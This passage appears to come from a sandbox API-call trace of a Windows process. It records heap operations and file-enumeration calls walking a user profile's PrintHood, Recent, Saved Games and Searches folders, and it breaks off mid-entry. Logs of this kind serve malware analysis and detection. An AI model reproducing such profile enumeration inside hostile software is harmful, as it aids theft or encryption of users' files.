(pszPath="") returned="" [0175.604] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.605] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\PrintHood\\*" (normalized: "c:\\users\\keecfmwgj\\printhood\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x85824980, ftCreationTime.dwHighDateTime=0x1d8a3a1, ftLastAccessTime.dwLowDateTime=0x668dc460, ftLastAccessTime.dwHighDateTime=0x1d8a477, ftLastWriteTime.dwLowDateTime=0x668dc460, ftLastWriteTime.dwHighDateTime=0x1d8a477, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ymOmNEPhoB", cAlternateFileName="YMOMNE~1")) returned 0xffffffff [0175.605] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.606] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d28008 | out: hHeap=0x6a0000) returned 1 [0175.606] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f480 | out: hHeap=0x6a0000) returned 1 [0175.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f480 [0175.606] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0175.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.606] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.609] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.609] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.609] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.609] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.610] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.610] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.610] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.610] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.610] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0175.610] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.611] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.611] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.611] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.611] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.611] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.612] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.612] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.612] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.612] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.612] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.612] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.612] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.613] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.613] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.614] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.614] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.614] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.614] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.614] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.615] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.615] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.615] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.615] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.615] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.615] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.615] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.616] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.616] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.616] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.616] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.616] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.616] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.616] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.617] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.617] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.617] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.617] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.617] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.617] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.618] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.618] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.618] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.618] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.618] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.618] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.618] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.619] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.619] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.619] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.619] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.619] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.619] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.620] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.620] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.620] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.620] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.620] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.620] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.621] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.621] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.621] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.621] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.621] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0175.621] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.622] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.622] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.622] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.622] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.622] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.622] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.622] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.623] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.623] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0175.623] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.623] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Recent\\") returned="Recent\\" [0175.623] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0175.623] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0175.623] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d28008 [0175.623] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0175.623] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0175.623] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0175.624] PathFindFileNameW (pszPath="") returned="" [0175.624] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.624] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Recent\\*" (normalized: "c:\\users\\keecfmwgj\\recent\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x85824980, ftCreationTime.dwHighDateTime=0x1d8a3a1, ftLastAccessTime.dwLowDateTime=0x668dc460, ftLastAccessTime.dwHighDateTime=0x1d8a477, ftLastWriteTime.dwLowDateTime=0x668dc460, ftLastWriteTime.dwHighDateTime=0x1d8a477, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ymOmNEPhoB", cAlternateFileName="YMOMNE~1")) returned 0xffffffff [0175.624] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0175.624] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.624] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.624] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Saved Games\\") returned="Saved Games\\" [0175.624] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d28008 [0175.625] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0175.625] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0175.625] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0175.625] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0175.625] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0175.625] PathFindFileNameW (pszPath="") returned="" [0175.625] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c70 [0175.625] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Saved Games\\*" (normalized: "c:\\users\\keecfmwgj\\saved games\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8847c0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0175.626] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8847c0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0175.626] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8847c0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0175.626] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8847c0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0175.626] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0175.627] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d28008 | out: hHeap=0x6a0000) returned 1 [0175.627] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f480 | out: hHeap=0x6a0000) returned 1 [0175.627] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f480 [0175.627] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0175.627] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.627] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.628] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.628] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.628] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.628] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.628] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.629] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.629] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.629] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.630] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.630] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.630] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.630] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.630] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.630] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.630] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.630] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.631] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.631] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.631] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.631] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.632] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.632] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.632] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.632] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.632] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0175.632] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.633] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.633] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.633] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.633] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.633] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.633] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.633] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.633] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.634] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.634] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.634] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.634] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.634] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.635] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.635] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.635] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.635] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.636] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.636] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.636] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.636] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.636] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.636] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.636] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.636] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.637] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.637] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.637] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.637] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.637] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.637] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.637] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.638] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.638] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.638] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Searches\\") returned="Searches\\" [0175.638] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0175.638] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0175.639] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0175.639] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0175.639] PathFindFileNameW (pszPath="") returned="" [0175.639] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Searches\\*" (normalized: "c:\\users\\keecfmwgj\\searches\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e82f090, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, 